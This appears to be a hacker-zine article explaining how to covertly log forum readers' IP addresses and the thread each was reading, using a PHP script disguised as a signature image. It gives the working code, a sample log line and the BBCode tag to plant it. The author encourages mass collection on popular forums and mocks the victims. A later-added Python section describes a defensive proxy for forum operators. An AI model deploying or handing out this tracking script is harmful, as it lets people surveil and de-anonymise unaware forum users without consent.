Tracking Users on Trustworthy Sources

by xnite (xnite@xnite.org)

When people think about hiding their IP address, they never stop to think about who other than a website administrator has access to it.  In reality, there are many trustworthy websites that we can exploit to obtain information on their visitors.  In this piece, I will focus primarily on forums, because they are something I'm a bit more familiar with.  But I'm sure you will find your own ways of doing things.

You may think it is safe to visit Ubuntu Forums or IRCForum without a proxy and that the only people who will have a record of your IP are the forum admins.  Think again!  I took 15 minutes out of my day to throw together a quick proof-of-concept for you guys and I think you will really enjoy it.

So I've been a member of a couple of different forums, and time after time some troll will pop up on my radar replying to my threads.  If your thread is fairly inactive, then this may be an easy way to track the troll down on the Internet; otherwise, maybe not so much.

<?php
// Serve the signature image.
header("Content-type: image/png");
echo file_get_contents('./rawimage.png');
// Append one line per request: timestamp, forum tag from ?id=, referring page, client IP.
$fh = fopen('forumlog.txt', 'a');
fwrite($fh, date('r').": Forum: ".$_GET['id']." | ".$_SERVER['HTTP_REFERER']." | IP: ".$_SERVER['REMOTE_ADDR']."\n");
fclose($fh);
?>

This piece of PHP code serves a PNG image file, rawimage.png, to a visitor while appending their details to the log file, forumlog.txt.  The URL to this script can be set as your forum signature image, and the id variable in the URL can be used to mark which forum a line of logs is coming from.

The output in the log file will look a lot like the line below:

Sun, 16 Sep 2012 01:07:34 -0600: Forum: forum | http://forum.tld/thread.php?id=1234567&page=2 | IP: 123.45.67.89

As mentioned previously, you can label each forum that you use your signature on by using a tag much like the following:

[IMG]http://yourdomain.tld/forumsig.php?id=NameOfForum[/IMG]

Anyone who visits a thread where your signature is shown will be recorded in the log file, so in theory you could use this on a place such as Hack Forums to post in various popular threads and gain the IP addresses of many forum users, which couldn't be good!

This sort of information gathering is rather hard to prevent, as most people would not suspect that clicking on a link to Ubuntu Forums or Linux Forums, for example, could be potentially harmful.  Since we use no JavaScript to carry out our attack, it cannot really be disabled either.  The victim just needs to kind of bend over and take it.
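
From the forum operator's side, one mitigation is to stop visitors' browsers from fetching signature images off-site at all.  The sketch below is an added example, not code from the original article: it flags [IMG] URLs that can act as visitor loggers and rewrites off-site ones to a same-origin proxy path.  FORUM_HOST, PROXY_PATH, PROXY_KEY and the function names are assumptions, and the proxy endpoint itself is not shown.

```python
import hashlib
import hmac
import re
from urllib.parse import urlsplit

# Assumptions (not from the article): the forum's own hostname, a same-origin
# image proxy path, and the secret the proxy uses to verify signed URLs.
FORUM_HOST = "forum.example"
PROXY_PATH = "/imgproxy"
PROXY_KEY = b"constructed-demo-key"

IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)
SCRIPT_EXT = (".php", ".cgi", ".pl", ".asp", ".aspx", ".jsp")


def audit_image_url(url):
    """Return the reasons a signature image URL can act as a visitor logger."""
    parts = urlsplit(url.strip())
    host = (parts.hostname or "").lower()
    if not host or host == FORUM_HOST:
        return []  # same-origin or relative: only the forum sees the request
    reasons = ["third-party host sees viewer IP and Referer"]
    if parts.path.lower().endswith(SCRIPT_EXT):
        reasons.append("served by a script, not a static file")
    if parts.query:
        reasons.append("query string can tag the forum or thread")
    return reasons


def proxied(url):
    """Same-origin URL; the HMAC stops the proxy fetching arbitrary URLs."""
    raw = url.strip().encode()
    sig = hmac.new(PROXY_KEY, raw, hashlib.sha256).hexdigest()
    return f"https://{FORUM_HOST}{PROXY_PATH}/{sig}/{raw.hex()}"


def harden_signature(bbcode):
    """Rewrite off-site [IMG] tags to the proxy and report what was found."""
    findings = []

    def rewrite(match):
        url = match.group(1)
        reasons = audit_image_url(url)
        if not reasons:
            return match.group(0)
        findings.append((url.strip(), reasons))
        return f"[IMG]{proxied(url)}[/IMG]"

    return IMG_TAG.sub(rewrite, bbcode), findings
```

With the rewrite in place, the image host sees only the proxy's address and no thread URL, so a log line like the one above no longer identifies the reader.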

At any rate, have fun with this, and try not to abuse it too much.
